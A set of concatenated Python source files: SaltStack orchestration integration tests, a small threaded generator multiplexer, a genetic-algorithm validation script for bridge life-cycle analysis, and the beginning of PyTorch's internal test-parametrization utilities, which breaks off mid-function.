def add_to_queue(self, q, cmd):
"""
helper method to add salt-run
return data to a queue
"""
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_output(self):
"""
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
"""
ret_output = self.run_run("state.orchestrate orch.simple")
bad_out = ["outputter:", " highstate"]
good_out = [
" Function: salt.state",
" Result: True",
"Succeeded: 1 (changed=1)",
"Failed: 0",
"Total states run: 1",
]
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
assert bad_out != ret_output
# Now test that some expected good sample output is present in the return.
for item in good_out:
assert item in ret_output
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_nested(self):
"""
test salt-run state.orchestrate and failhard with nested orchestration
"""
if os.path.exists("/tmp/ewu-2016-12-13"):
os.remove("/tmp/ewu-2016-12-13")
_, code = self.run_run("state.orchestrate nested-orch.outer", with_retcode=True)
assert os.path.exists("/tmp/ewu-2016-12-13") is False
assert code != 0
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_with_mine(self):
"""
test salt-run state.orchestrate with mine.get call in sls
"""
fail_time = time.time() + 120
self.run_run('mine.update "*"')
exp_ret = "Succeeded: 1 (changed=1)"
while True:
ret = self.run_run("state.orchestrate orch.mine")
try:
assert exp_ret in ret
break
except AssertionError:
if time.time() > fail_time:
self.fail(
'"{0}" was not found in the orchestration call'.format(exp_ret)
)
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_state_and_function_failure(self):
"""
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programatically analyzed.
See https://github.com/saltstack/salt/issues/43204
"""
self.run_run("saltutil.sync_modules")
ret = salt.utils.json.loads(
"\n".join(self.run_run("state.orchestrate orch.issue43204 --out=json"))
)
# Drill down to the changes dict
state_ret = ret["data"]["master"]["salt_|-Step01_|-Step01_|-state"]["changes"]
func_ret = ret["data"]["master"][
"salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function"
]["changes"]
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ("duration", "start_time"):
state_ret["ret"]["minion"][
"test_|-test fail with changes_|-test fail with changes_|-fail_with_changes"
].pop(item)
self.assertEqual(
state_ret,
{
"out": "highstate",
"ret": {
"minion": {
"test_|-test fail with changes_|-test fail with changes_|-fail_with_changes": {
"__id__": "test fail with changes",
"__run_num__": 0,
"__sls__": "orch.issue43204.fail_with_changes",
"changes": {
"testing": {
"new": "Something pretended to change",
"old": "Unchanged",
}
},
"comment": "Failure!",
"name": "test fail with changes",
"result": False,
}
}
},
},
)
self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_target_exists(self):
"""
test orchestration when target exists
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-exists")
first = [" ID: core", " Function: salt.state", " Result: True"]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_retcode(self):
"""
Test orchestration with nonzero retcode set in __context__
"""
self.run_run("saltutil.sync_runners")
self.run_run("saltutil.sync_wheel")
ret = "\n".join(self.run_run("state.orchestrate orch.retcode"))
for result in (
" ID: test_runner_success\n"
" Function: salt.runner\n"
" Name: runtests_helpers.success\n"
" Result: True",
" ID: test_runner_failure\n"
" Function: salt.runner\n"
" Name: runtests_helpers.failure\n"
" Result: False",
" ID: test_wheel_success\n"
" Function: salt.wheel\n"
" Name: runtests_helpers.success\n"
" Result: True",
" ID: test_wheel_failure\n"
" Function: salt.wheel\n"
" Name: runtests_helpers.failure\n"
" Result: False",
):
self.assertIn(result, ret)
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_target_does_not_exist(self):
"""
test orchestration when target doesn't exist
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-does-not-exist")
first = [
"No minions matched the target. No command was sent, no jid was assigned.",
" ID: core",
" Function: salt.state",
" Result: False",
]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_batch_with_failhard_error(self):
"""
test orchestration properly stops with failhard and batch.
"""
ret = self.run_run("state.orchestrate orch.batch --out=json -l critical")
ret_json = salt.utils.json.loads("\n".join(ret))
retcode = ret_json["retcode"]
result = ret_json["data"]["master"][
"salt_|-call_fail_state_|-call_fail_state_|-state"
]["result"]
changes = ret_json["data"]["master"][
"salt_|-call_fail_state_|-call_fail_state_|-state"
]["changes"]
# Looks like there is a platform differences in execution.
# I see empty changes dict in MacOS for some reason. Maybe it's a bug?
if changes:
changes_ret = changes["ret"]
# Debug
print("Retcode: {}".format(retcode))
print("Changes: {}".format(changes))
print("Result: {}".format(result))
assert retcode != 0
assert result is False
if changes:
# The execution should stop after first error, so return dict should contain only one minion
assert len(changes_ret) == 1
@skipIf(True, "SLOWTEST skip")
def test_state_event(self):
"""
test to ensure state.event
runner returns correct data
"""
q = queue.Queue(maxsize=0)
cmd = "state.event salt/job/*/new count=1"
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt("minion test.ping --static")
out = q.get()
assert expect in six.text_type(out)
server_thread.join()
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_subset(self):
"""
test orchestration state using subset
"""
ret = self.run_run("state.orchestrate orch.subset", timeout=500)
def count(thing, listobj):
return sum([obj.strip() == thing for obj in listobj])
assert count("ID: test subset", ret) == 1
assert count("Succeeded: 1", ret) == 1
assert count("Failed: 0", ret) == 1
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_salt_function_return_false_failure(self):
"""
Ensure that functions that only return False in the return
are flagged as failed when run as orchestrations.
See https://github.com/saltstack/salt/issues/30367
"""
self.run_run("saltutil.sync_modules")
ret = salt.utils.json.loads(
"\n".join(self.run_run("state.orchestrate orch.issue30367 --out=json"))
)
# Drill down to the changes dict
state_result = ret["data"]["master"][
"salt_|-deploy_check_|-test.false_|-function"
]["result"]
func_ret = ret["data"]["master"]["salt_|-deploy_check_|-test.false_|-function"][
"changes"
]
assert state_result is False
self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@skipIf(salt.utils.platform.is_windows(), "*NIX-only test")
@flaky
class OrchEventTest(ShellCase):
"""
Tests for orchestration events
"""
RUN_TIMEOUT = 300
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master.d")
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode="w", suffix=".conf", dir=self.master_d_dir, delete=True,
)
self.base_env = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ("timeout", "master_d_dir", "conf", "base_env"):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, "test.arg")
def alarm_handler(self, signal, frame):
raise Exception("Timeout of {0} seconds reached".format(self.timeout))
def write_conf(self, data):
"""
Dump the config dict to the conf file
"""
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
@expensiveTest
def test_jid_in_ret_event(self):
"""
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
state_sls = os.path.join(self.base_env, "test_state.sls")
with salt.utils.files.fopen(state_sls, "w") as fp_:
fp_.write(
salt.utils.stringutils.to_str(
textwrap.dedent(
"""
date:
cmd.run
"""
)
)
)
orch_sls = os.path.join(self.base_env, "test_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
salt.utils.stringutils.to_str(
textwrap.dedent(
"""
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
"""
)
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "test_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event["tag"] == "salt/run/{0}/ret".format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for job in ret:
self.assertTrue("__jid__" in ret[job])
break
finally:
del listener
signal.alarm(0)
@expensiveTest
def test_parallel_orchestrations(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{% for count in range(1, 20) %}
sleep {{ count }}:
module.run:
- name: test.sleep
- length: 10
- parallel: True
{% endfor %}
sleep 21:
module.run:
- name: test.sleep
- length: 10
- parallel: True
- require:
- module: sleep 1
"""
)
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
start_time = time.time()
jid = self.run_run_plus("state.orchestrate", "test_par_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# if we receive the ret for this job before self.timeout (60),
# the test is implicitly successful; if it were happening in serial it would be
# atleast 110 seconds.
if event["tag"] == "salt/run/{0}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# we expect each duration to be greater than 10s
self.assertTrue(data["duration"] > 10000)
break
# self confirm that the total runtime is roughly 30s (left 10s for buffer)
self.assertTrue((time.time() - start_time) < 40)
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@expensiveTest
def test_orchestration_soft_kill(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "two_stage_orch_kill.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
stage_one:
test.succeed_without_changes
stage_two:
test.fail_without_changes
"""
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
mock_jid = "20131219120000000000"
self.run_run("state.soft_kill {0} stage_two".format(mock_jid))
with patch("salt.utils.jid.gen_jid", MagicMock(return_value=mock_jid)):
jid = self.run_run_plus("state.orchestrate", "two_stage_orch_kill").get(
"jid"
)
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# Ensure that stage_two of the state does not run
if event["tag"] == "salt/run/{0}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
self.assertNotIn(
"test_|-stage_two_|-stage_two_|-fail_without_changes", ret
)
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@skipIf(True, "SLOWTEST skip")
def test_orchestration_with_pillar_dot_items(self):
"""
Test to confirm when using a state file that includes other state file, if
one of those state files includes pillar related functions that will not
be pulling from the pillar cache that all the state files are available and
the file_roots has been preserved. See issues #48277 and #46986.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "main.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
include:
- one
- two
- three
"""
)
)
orch_sls = os.path.join(self.base_env, "one.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{%- set foo = salt['saltutil.runner']('pillar.show_pillar') %}
placeholder_one:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "two.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_two:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "three.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_three:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "main.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "main").get("jid")
if jid is None:
raise salt.exceptions.SaltInvocationError(
"jid missing from run_run_plus output"
)
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event.get("tag", "") == "salt/run/{0}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# Each state should be successful
self.assertEqual(data["comment"], "Success!")
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@skipIf(True, "SLOWTEST skip")
def test_orchestration_onchanges_and_prereq(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
manage_a_file:
salt.state:
- tgt: minion
- sls:
- orch.req_test
do_onchanges:
salt.function:
- tgt: minion
- name: test.ping
- onchanges:
- salt: manage_a_file
do_prereq:
salt.function:
- tgt: minion
- name: test.ping
- prereq:
- salt: manage_a_file
"""
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
try:
jid1 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
# Run for real to create the file
self.run_run_plus("state.orchestrate", "orch").get("jid")
# Run again in test mode. Since there were no changes, the
# requisites should not fire.
jid2 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
finally:
try:
os.remove(os.path.join(RUNTIME_VARS.TMP, "orch.req_test"))
except OSError:
pass
assert jid1 is not None
assert jid2 is not None
tags = {"salt/run/{0}/ret".format(x): x for x in (jid1, jid2)}
ret = {}
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event["tag"] in tags:
ret[tags.pop(event["tag"])] = self.repack_state_returns(
event["data"]["return"]["data"]["master"]
)
if not tags:
# If tags is empty, we've grabbed all the returns we
# wanted, so let's stop listening to the event bus.
break
finally:
del listener
signal.alarm(0)
for sls_id in ("manage_a_file", "do_onchanges", "do_prereq"):
# The first time through, all three states should have a None
# result, while the second time through, they should all have a
# True result.
assert (
ret[jid1][sls_id]["result"] is None
), "result of {0} ({1}) is not None".format(
sls_id, ret[jid1][sls_id]["result"]
)
assert (
ret[jid2][sls_id]["result"] is True
), "result of {0} ({1}) is not True".format(
sls_id, ret[jid2][sls_id]["result"]
)
# The file.managed state should have shown changes in the test mode
# return data.
assert ret[jid1]["manage_a_file"]["changes"]
# After the file was created, running again in test mode should have
# shown no changes.
assert not ret[jid2]["manage_a_file"]["changes"], ret[jid2]["manage_a_file"][
"changes"
]
|
multiplexer.py
|
from __future__ import absolute_import
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # Python 3.x
# Yield STOP from an input generator to stop the
# top-level loop without processing any more input.
STOP = object()
class Multiplexer(object):
def __init__(self, generators):
self.generators = generators
self.queue = Queue()
def loop(self):
self._init_readers()
while True:
try:
item = self.queue.get(timeout=0.1)
if item is STOP:
break
else:
yield item
except Empty:
pass
def _init_readers(self):
for generator in self.generators:
t = Thread(target=_enqueue_output, args=(generator, self.queue))
t.daemon = True
t.start()
def _enqueue_output(generator, queue):
for item in generator:
queue.put(item)
|
Example3.py
|
# -------------------------------------------------------------------- #
# This eexample was designed to show the GA can produce near optimal solutions
# It was used as a response to reviewers of AUTCON journal
# -------------------------------------------------------------------- #
import time
import ast
import pandas as pd
import multiprocessing as mp
from multiprocessing import Process, Queue
import itertools
from Network.IndianaNetwork import IndianaNetwork
from LifeCycleAnalyzer.Simulators.MainSimulator import MainSimulator
from LifeCycleAnalyzer.LCA import LCA
from Optimizer.GA import GA
from Optimizer.IUC import IUC
from utils.PredictiveModels.Linear import Linear
from utils.AwesomeTimeIt import timeit
from utils.GeneralSettings import *
def lca(mrr = None):
session_name = 'Indiana'
mynetwork = IndianaNetwork("INDIANA2019",
n_assets = 1,
is_deck = False,
is_superstructure = True,
is_substructure = False)
mynetwork.load_network()
if not mrr is None:
mynetwork.assets[0].mrr_model.set_mrr(mrr)
mynetwork.set_current_budget_limit(100000)
mynetwork.set_budget_limit_model(Linear(X0 = 100000, drift = 0))
mynetwork.set_npv_budget_limit(10000)
simulator = MainSimulator()
lca = LCA(network = mynetwork,
lca_name = session_name,
simulator = simulator,
random = False,
is_hazard = False,
n_simulations = 500)
return lca
def GA_test(obj):
optimizer = GA(obj)
optimizer.set_ga_chars(crossver_prob = 0.75,
mutation_prob = 0.1,
population_size = 50,
n_generations = 100,
n_elites = 5,
optimzition_type = 'max',
n_jobs = -1)
optimizer.optimize()
@timeit
def example():
mylca = lca()
mylca.run()
# GA_test(lca)
# ---------------------------- #
# For the parallel section #
def lca_for_validation(mrrs, q_out):
for mrr in mrrs:
session_name = 'Indiana'
mynetwork = IndianaNetwork("INDIANA2019",
n_assets = 1,
is_deck = False,
is_superstructure = True,
is_substructure = False)
mynetwork.load_network()
mynetwork.set_current_budget_limit(100000)
mynetwork.set_budget_limit_model(Linear(X0 = 100000, drift = 0))
mynetwork.set_npv_budget_limit(10000)
mynetwork.assets[0].mrr_model.set_mrr(np.atleast_2d(mrr))
simulator = MainSimulator()
lca = LCA(network = mynetwork,
lca_name = session_name,
simulator = simulator,
random = False,
is_hazard = False,
n_simulations = 1000)
lca.run()
results = lca.get_network_npv()
q_out.put(mrr + results)
def validate_ga(N = None, batch_size = 20000):
results_queue = Queue()
n_cores = mp.cpu_count()-2
genset = GenSet()
combs = list(itertools.product([0, 1], repeat = genset.n_steps * genset.dt * genset.n_elements))
if not N is None:
combs = combs[:N]
slicer = int(len(combs)/n_cores) + 1
# Creating and filling the pool
pool = []
for j in range (n_cores):
init_idx = j * slicer
last_idx = (j + 1) * slicer if j < n_cores-1 else len(combs)
worker = Process(target = lca_for_validation, args = (combs[init_idx: last_idx], results_queue,))
pool.append(worker)
print('starting processes...')
for worker in pool:
worker.start()
all_samples = []
done_workers = 0
batch_number = 0
cols = []
for elem_number in range(genset.n_elements):
for i in range (genset.dt*genset.n_steps):
cols.append(f'Eelem{elem_number}-{i}')
cols += ['UserCost', 'AgencyCost', 'Utility']
def save_batch(all_samples, cols, batch_number, batch_size = batch_size):
batch_number += 1
df = pd.DataFrame(all_samples[:batch_size], columns = cols)
df.to_csv(f"./reports/GA-Validation-{batch_number}.csv")
print (f'Batch number {batch_number} is done')
return batch_number, all_samples[batch_size:]
while any(worker.is_alive() for worker in pool):
while not results_queue.empty():
sample = results_queue.get()
if not sample is None:
all_samples.append(sample)
if len(all_samples) > batch_size:
batch_number, all_samples = save_batch(all_samples, cols, batch_number)
print('waiting for workers to join...')
for worker in pool:
worker.join()
print('all workers are joined.\n')
if len(all_samples) > 0:
batch_number, all_samples = save_batch(all_samples, cols, batch_number)
print (f'Done')
if __name__ == "__main__":
# example1()
validate_ga()
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
In the details, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
Args:
handles_dtypes (bool): If True, indicates that it is the responsibility of the decorator to handle
dtypes internally. This allows for more flexibility when needed (e.g. for op-specific dtype handling).
Default: True
"""
def __init__(self, handles_dtypes=True):
self.handles_dtypes = handles_dtypes
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
yield (new_test, '{}_{}'.format(new_test_name, old_test_name), full_param_kwargs)
fn.parametrize_fn = composite_fn
old_handles_dtypes = fn.handles_dtypes if hasattr(fn, 'handles_dtypes') else False
if self.handles_dtypes and old_handles_dtypes:
raise RuntimeError('Cannot compose multiple parametrization decorators that handle dtypes; '
'their dtype handling conflicts')
fn.handles_dtypes = self.handles_dtypes or old_handles_dtypes
else:
fn.parametrize_fn = self._parametrize_test
fn.handles_dtypes = self.handles_dtypes
return fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
if hasattr(class_attr, 'handles_dtypes') and class_attr.handles_dtypes:
raise RuntimeError('instantiate_parametrized_tests() should not be used with decorators '
'that handle dtypes internally (e.g. @ops, @modules, etc.). Use '
'instantiate_device_type_tests() with these instead.')
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consists of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separate by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
super().__init__(handles_dtypes=False)
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
